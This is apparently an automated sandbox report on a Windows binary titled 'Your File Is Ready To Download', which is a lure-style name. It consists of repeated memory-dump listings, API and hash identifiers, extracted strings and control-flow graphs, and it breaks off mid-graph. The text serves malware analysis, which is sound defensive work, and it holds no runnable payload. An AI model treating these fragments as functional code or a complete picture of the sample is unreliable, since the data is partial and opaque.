                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                                                                          • Opcode ID: 7a0a428579f1c7b9359d3ccd9ed5bc1c56c2f02a59f637aceb6469dd342f9485
                                                                                                                                                                                                                          • Instruction ID: b10f652044382334588a36016033f15b5720062d7861cc5e40244e113047dfa7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a0a428579f1c7b9359d3ccd9ed5bc1c56c2f02a59f637aceb6469dd342f9485
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F951E332314B8491EA16DB129548BDA73A5FB98BF4F569315EF69037E4EF38C44AC700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
                                                                                                                                                                                                                          • API String ID: 0-457448710
                                                                                                                                                                                                                          • Opcode ID: 735822e78bffa75d5642fdd73663675dda92776e70ae9bd98a431285dc0bbc70
                                                                                                                                                                                                                          • Instruction ID: 860f5a8a497f6e7cc6376da9d1a84c773342d96c536585e96f7e74c1d9c58392
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 735822e78bffa75d5642fdd73663675dda92776e70ae9bd98a431285dc0bbc70
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7942A773200A808AEB76CF2AD5447E937A1F75CBC8F558612EF594BBA5EB34C691C340
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$CreateInformationVersion
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3563531100-0
                                                                                                                                                                                                                          • Opcode ID: 485e67b815213ebe75aea5d46a95619b67317113fdcb7fc7ccf1d162a3130600
                                                                                                                                                                                                                          • Instruction ID: b04cb3fe38b125b63014ad02eeab877848254fcf05d1bfd7767625559010cf5d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 485e67b815213ebe75aea5d46a95619b67317113fdcb7fc7ccf1d162a3130600
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29E0ED7461579083FB8A6B16A8497D92251BB9CBC1F905419EB4A03764DF3CC0468614
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$ForegroundIconicVisibleZoomed
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2502755998-0
                                                                                                                                                                                                                          • Opcode ID: c8433a945dd130153639f98e41458fc8fe3c1a2b3aae1db4d9fedb456d749ac5
                                                                                                                                                                                                                          • Instruction ID: 6499a9184c1e6f9c34c24ebe9ab9486ad435745bd79f262569d7ba410843448c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8433a945dd130153639f98e41458fc8fe3c1a2b3aae1db4d9fedb456d749ac5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BFF0C23160868442E653EB2729503FDA6D16B8DBC4F181120BF834BBB6CF79C4009354
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 3302 1400adc60-1400adc8b 3303 1400adc8d-1400adc9c LoadLibraryExW 3302->3303 3304 1400adc9e 3302->3304 3305 1400adca5-1400adca8 3303->3305 3304->3305 3306 1400ade6e-1400ade71 3305->3306 3307 1400adcae-1400adcc0 3305->3307 3310 1400ade7a-1400ade7e 3306->3310 3311 1400ade73-1400ade78 3306->3311 3308 1400adcce-1400add01 EnumResourceNamesW 3307->3308 3309 1400adcc2-1400adccc 3307->3309 3313 1400add06-1400add09 3308->3313 3309->3313 3312 1400ade82-1400ade8a ExtractIconW 3310->3312 3311->3312 3314 1400ade90-1400adea9 3312->3314 3315 1400add0f-1400add21 FindResourceW 3313->3315 3316 1400ade37-1400ade4a 3313->3316 3315->3316 3317 1400add27-1400add36 LoadResource 3315->3317 3318 1400ade4c-1400ade4f 3316->3318 3319 1400ade56-1400ade59 3316->3319 3317->3316 3320 1400add3c-1400add4b LockResource 3317->3320 3318->3319 3321 1400ade51-1400ade54 3318->3321 3322 1400ade5b-1400ade5e FreeLibrary 3319->3322 3323 1400ade64-1400ade67 3319->3323 3320->3316 3324 1400add51-1400add5a 3320->3324 3321->3323 3322->3323 3323->3306 3325 1400ade69-1400ade6c 3323->3325 3326 1400add5c-1400add65 GetSystemMetrics 3324->3326 3327 1400add67-1400add77 3324->3327 3325->3314 3326->3327 3327->3316 3328 1400add7d-1400add88 3327->3328 3329 1400add90-1400add9e 3328->3329 3330 1400adda0-1400adda6 3329->3330 3331 1400adda8-1400addaa 3329->3331 3332 1400addad-1400addaf 3330->3332 3331->3332 3333 1400addb1-1400addb4 3332->3333 3334 1400addb7-1400addc2 3332->3334 3333->3334 3334->3329 3335 1400addc4-1400addc7 3334->3335 3335->3316 3336 1400addc9-1400adde1 FindResourceW 3335->3336 3336->3316 3337 1400adde3-1400addf2 LoadResource 3336->3337 3337->3316 3338 1400addf4-1400ade03 LockResource 3337->3338 3338->3316 3339 1400ade05-1400ade34 SizeofResource CreateIconFromResourceEx 3338->3339 3339->3316
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Resource$Load$FindIconLock$CreateEnumExtractFromLibraryMetricsNamesSizeofSystem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1568753105-0
                                                                                                                                                                                                                          • Opcode ID: ffb817b8c69ba48c99ff27022b2134c4d0023426584ad7ed8cb5ecf69c1e7d2a
                                                                                                                                                                                                                          • Instruction ID: 78f0b144c0c4f371b41ad671c11dcad956fa3e5cfac34bdb993dbd866c53a778
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffb817b8c69ba48c99ff27022b2134c4d0023426584ad7ed8cb5ecf69c1e7d2a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A251973130179085EA66AF13A4147F972A4BB6CFD4F48452AEF4B4BBA4DB7DC885CB10
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$ClassCurrentDialogDirectoryDragFinishForegroundMessageNameProcessThread
                                                                                                                                                                                                                          • String ID: #32770
                                                                                                                                                                                                                          • API String ID: 3456408793-463685578
                                                                                                                                                                                                                          • Opcode ID: 9582ef0d1eb55107b69af7a2158272834f0dac25b62553382c3d829a3df79961
                                                                                                                                                                                                                          • Instruction ID: 6c7f57e873ea1f2ac3e5c59e57f37a7b4e9ec96122aeafd1b531d591dce64036
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9582ef0d1eb55107b69af7a2158272834f0dac25b62553382c3d829a3df79961
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CAC11A72205B858AFB66CF27A9543E937A0B78DBD4F144126EF491BBB4DB38C981C710
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _amsg_exit$CommandInfoInitializeLineStartup__wsetargv_cinit_wwincmdln
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 697445056-0
                                                                                                                                                                                                                          • Opcode ID: 1d503fbbcda832882e8a9619ec5c8f30e94001e0008c0cdb69518c1c829d2806
                                                                                                                                                                                                                          • Instruction ID: 9368ea0ec24b77c97e4d18523a0ebe8af8c7395c2174bbe91fb1f2ab21c7336b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d503fbbcda832882e8a9619ec5c8f30e94001e0008c0cdb69518c1c829d2806
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62414B3062874182FB6FABA3E5557ED2291AB9D7C4F008139FB46872F3EE38C9459611
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 4273 14002e080-14002e0a2 4274 14002e0a4-14002e0a7 4273->4274 4275 14002e0dd-14002e0e8 4273->4275 4276 14002e0c2-14002e0c9 4274->4276 4277 14002e0a9-14002e0be 4274->4277 4278 14002e0cb-14002e0d8 call 140040160 4276->4278 4279 14002e0e9-14002e112 call 1400cc0e4 4276->4279 4277->4276 4278->4275 4283 14002e118-14002e11d 4279->4283 4284 14002e4bd 4279->4284 4285 14002e120-14002e12a 4283->4285 4286 14002e4bf-14002e4d8 4284->4286 4287 14002e12c-14002e138 call 1400ca438 4285->4287 4288 14002e13a-14002e13c 4285->4288 4287->4288 4290 14002e152-14002e15a 4287->4290 4288->4290 4291 14002e13e-14002e150 call 1400c9f04 4288->4291 4290->4285 4292 14002e15c 4290->4292 4291->4290 4297 14002e15e-14002e1a5 call 1400abbf0 call 140040160 4291->4297 4295 14002e1ab-14002e1d0 call 14002e730 4292->4295 4302 14002e281-14002e29e call 1400a8d40 4295->4302 4303 14002e1d6-14002e1d9 4295->4303 4297->4284 4297->4295 4302->4284 4315 14002e2a4-14002e2ae 4302->4315 4306 14002e1f4-14002e1f7 4303->4306 4307 14002e1db-14002e1ee call 1400c8eec 4303->4307 4311 14002e1f9-14002e1ff 4306->4311 4312 14002e26d-14002e27c 4306->4312 4307->4302 4307->4306 4311->4284 4313 14002e205-14002e23d call 14002dd80 4311->4313 4314 14002e4b5-14002e4b8 call 140040160 4312->4314 4313->4286 4326 14002e243-14002e268 call 14002e080 4313->4326 4314->4284 4319 14002e2c3-14002e2cb 4315->4319 4320 14002e2b0-14002e2c0 4315->4320 4322 14002e2e9-14002e2f5 4319->4322 4323 14002e2cd-14002e2dc call 1400a8e90 4319->4323 4320->4319 4324 14002e317-14002e332 4322->4324 4325 14002e2f7-14002e30a call 1400a8e90 4322->4325 4330 14002e4a7-14002e4ae 4323->4330 4333 14002e2e2 4323->4333 4324->4330 4331 14002e338-14002e340 4324->4331 4325->4330 4338 14002e310 4325->4338 4326->4286 4330->4314 4336 14002e342-14002e346 4331->4336 4337 14002e348 4331->4337 4333->4322 4339 14002e34e-14002e36a call 14001c120 4336->4339 4337->4339 4338->4324 4339->4330 4342 14002e370-14002e373 4339->4342 4343 14002e375-14002e384 4342->4343 4344 14002e386-14002e38a 4342->4344 4345 14002e38e-14002e39e 4343->4345 4344->4345 4346 14002e3e7-14002e3f1 4345->4346 4347 14002e3a0-14002e3ac 4345->4347 4350 14002e3f3-14002e406 4346->4350 4351 14002e408-14002e410 4346->4351 4348 14002e3cc-14002e3dd 4347->4348 4349 14002e3ae-14002e3c4 call 1400c9bd0 4347->4349 4348->4346 4353 14002e3df-14002e3e2 4348->4353 4349->4348 4354 14002e414-14002e426 4350->4354 4351->4354 4353->4286 4356 14002e428-14002e433 4354->4356 4357 14002e435-14002e439 4354->4357 4356->4357 4358 14002e43f-14002e446 4356->4358 4357->4358 4359 14002e516 4357->4359 4361 14002e448-14002e454 4358->4361 4362 14002e459-14002e45b 4358->4362 4360 14002e51b-14002e51e 4359->4360 4365 14002e55f-14002e580 4360->4365 4366 14002e520-14002e52c 4360->4366 4364 14002e4e8-14002e4f2 call 1400ca474 4361->4364 4363 14002e461-14002e468 4362->4363 4362->4364 4363->4364 4368 14002e46a-14002e471 4363->4368 4373 14002e4f7-14002e4fa 4364->4373 4371 14002e582-14002e58d 4365->4371 4372 14002e5c6-14002e5ce 4365->4372 4369 14002e548-14002e55a 4366->4369 4370 14002e52e-14002e543 call 1400c9bd0 4366->4370 4376 14002e473-14002e478 4368->4376 4377 14002e4d9-14002e4e0 4368->4377 4369->4286 4370->4369 4379 14002e590-14002e5a2 call 1400c8eec 4371->4379 4374 14002e5fb-14002e61c 4372->4374 4375 14002e5d0-14002e5d4 4372->4375 4373->4330 4380 14002e4fc-14002e514 4373->4380 4384 14002e622-14002e639 4374->4384 4385 14002e70d-14002e71e 4374->4385 4381 14002e5e0-14002e5f9 4375->4381 4382 14002e487 4376->4382 4383 14002e47a-14002e485 4376->4383 4377->4364 4387 14002e4e2 4377->4387 4394 14002e5a4-14002e5ad 4379->4394 4395 14002e5af-14002e5be 4379->4395 4380->4360 4381->4374 4381->4381 4388 14002e48b-14002e4a5 call 1400c8f74 4382->4388 4383->4388 4389 14002e640-14002e65c 4384->4389 4385->4286 4387->4364 4388->4330 4388->4364 4392 14002e69e-14002e6fd call 1400c9bd0 4389->4392 4393 14002e65e 4389->4393 4392->4389 4401 14002e703-14002e708 4392->4401 4397 14002e660-14002e681 call 1400c8eec 4393->4397 4394->4379 4394->4395 4395->4372 4403 14002e683-14002e686 4397->4403 4404 14002e688 4397->4404 4401->4385 4405 14002e68b-14002e692 4403->4405 4404->4405 4405->4397 4406 14002e694-14002e699 4405->4406 4406->4392
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcsncpy
                                                                                                                                                                                                                          • String ID: ErrorLevel$Illegal parameter name.$Out of memory.$The following %s name contains an illegal character:"%-1.300s"$Variable name too long.$_$#@$variable
                                                                                                                                                                                                                          • API String ID: 322933527-511781698
                                                                                                                                                                                                                          • Opcode ID: fef627082e009b1956e834ff8a6167b0fa8f3d850a97a3b73f2e3d80e6ad6322
                                                                                                                                                                                                                          • Instruction ID: 951995fd0d9102cb58700664fbdfea69c13a9f70c1cc31b842a6c829c38dd2e9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fef627082e009b1956e834ff8a6167b0fa8f3d850a97a3b73f2e3d80e6ad6322
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5128B32215BC086EB62DF16E4803D973A5F788BE4F54022AEB9D47BE9DB38C955C740
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 4515 14001a010-14001a02e ActivateKeyboardLayout 4516 14001a034-14001a03d 4515->4516 4517 14001a16c-14001a179 4515->4517 4518 14001a040-14001a050 4516->4518 4518->4518 4519 14001a052-14001a062 GetKeyboardLayoutNameW 4518->4519 4520 14001a068-14001a092 RegOpenKeyExW 4519->4520 4521 14001a15c-14001a15f 4519->4521 4520->4521 4523 14001a098-14001a0fa RegQueryValueExW RegCloseKey 4520->4523 4521->4517 4522 14001a161-14001a166 ActivateKeyboardLayout 4521->4522 4522->4517 4523->4521 4524 14001a0fc-14001a105 4523->4524 4524->4521 4525 14001a107-14001a113 4524->4525 4526 14001a135-14001a13d 4525->4526 4527 14001a115-14001a117 4525->4527 4526->4521 4529 14001a13f 4526->4529 4527->4521 4528 14001a119 4527->4528 4530 14001a120-14001a12b 4528->4530 4531 14001a147-14001a149 4529->4531 4530->4531 4533 14001a12d-14001a131 4530->4533 4531->4521 4532 14001a14b-14001a159 LoadLibraryW 4531->4532 4532->4521 4533->4530 4534 14001a133 4533->4534 4534->4521
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: KeyboardLayout$Activate$CloseLibraryLoadNameOpenQueryValue
                                                                                                                                                                                                                          • String ID: Layout File$SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
                                                                                                                                                                                                                          • API String ID: 530040227-1038698864
                                                                                                                                                                                                                          • Opcode ID: f78ed5f12aae807a10c71693ae0e7398b7120a842c33079b0cd378eee554b31c
                                                                                                                                                                                                                          • Instruction ID: 80c8a57b74420098663485768f92c7745f417b110f1ff33b5c08b2ad1e47dad3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f78ed5f12aae807a10c71693ae0e7398b7120a842c33079b0cd378eee554b31c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B316F31705AC191FB729B16E4547FE72A1FBCABD4F444224EB8947AA8EB7DC445C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 4535 140038325-14003832c 4536 1400383a5-1400383c9 call 14001ca20 4535->4536 4537 14003832e-140038335 4535->4537 4546 1400383cb-1400383dd 4536->4546 4547 1400383df 4536->4547 4539 140038381-140038385 4537->4539 4540 140038337-140038340 4537->4540 4544 14003838c-1400383a0 call 1400a8bd0 4539->4544 4542 140038373 4540->4542 4543 140038342-140038371 call 1400abbf0 4540->4543 4549 14003837a-14003837f 4542->4549 4543->4549 4553 1400384b6-1400384ba 4544->4553 4551 1400383e6-1400383ea 4546->4551 4547->4551 4549->4544 4554 1400383f3-14003840b call 1400c8eec 4551->4554 4555 1400383ec-1400383f1 4551->4555 4558 1400384bc-1400384c2 4553->4558 4556 14003840f-14003842a call 1400a8bd0 4554->4556 4555->4556 4556->4558 4566 140038430-140038433 4556->4566 4561 1400384c8-1400384e7 4558->4561 4562 1400388ae-1400388db 4558->4562 4561->4562 4565 1400384ed-1400384fb 4561->4565 4568 140038507 4565->4568 4566->4558 4567 140038439 4566->4567 4567->4553 4569 14003850b-14003850e 4568->4569 4570 140038514-140038516 4569->4570 4571 1400388ac 4569->4571 4573 140032011-14003202e GetTickCount 4570->4573 4574 140031fe0-140031fe8 4570->4574 4571->4562 4577 140032067-14003206e 4573->4577 4578 140032030-14003204d PeekMessageW 4573->4578 4575 140031fea-140031ff7 GlobalUnlock 4574->4575 4576 140031ffe-14003200a CloseClipboard 4574->4576 4575->4576 4576->4573 4581 14003209a-1400320a8 4577->4581 4582 140032070-140032077 4577->4582 4579 140032059-140032061 GetTickCount 4578->4579 4580 14003204f-140032054 call 140001ac0 4578->4580 4579->4577 4580->4579 4585 1400320aa-1400320ad 4581->4585 4586 1400320af-1400320b5 4581->4586 4582->4581 4584 140032079-140032082 4582->4584 4584->4581 4589 140032084-140032089 4584->4589 4585->4586 4590 1400320c1-1400320cd call 140001ac0 4585->4590 4587 1400320d4-1400320db 4586->4587 4588 1400320b7-1400320bf 4586->4588 4592 1400320fc-14003210f 4587->4592 4593 1400320dd 4587->4593 4588->4587 4588->4590 4594 140032094-140032097 4589->4594 4595 14003208b-140032092 4589->4595 4590->4587 4598 140032111-140032158 GetTickCount 4592->4598 4599 14003215d-140032163 4592->4599 4597 1400320e0-1400320f3 call 140001ac0 4593->4597 4594->4581 4595->4581 4608 1400320f5 4597->4608 4598->4599 4601 1400321a1 4599->4601 4602 140032165-140032167 4599->4602 4603 1400321a8-1400321b4 4601->4603 4602->4601 4605 140032169-140032172 4602->4605 4606 1400321ba-1400321be 4603->4606 4607 14003236e-140032381 4603->4607 4605->4603 4609 140032174-14003218d call 140088c90 4605->4609 4606->4607 4611 1400321c4-1400321de call 140038da0 4606->4611 4612 140033671-14003369e 4607->4612 4613 140032387-14003239a 4607->4613 4608->4592 4609->4562 4618 140032193-14003219f 4609->4618 4621 1400321e4-1400321eb 4611->4621 4622 1400322a6-1400322b3 4611->4622 4616 1400336a4-1400336ae 4612->4616 4617 